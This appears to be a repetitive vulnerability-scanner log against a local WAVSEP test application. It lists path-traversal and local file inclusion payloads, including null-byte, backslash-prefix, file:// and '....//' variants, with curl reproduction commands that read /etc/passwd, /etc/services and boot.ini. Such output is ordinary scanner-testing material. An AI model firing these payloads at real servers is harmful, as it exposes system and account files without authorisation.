curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

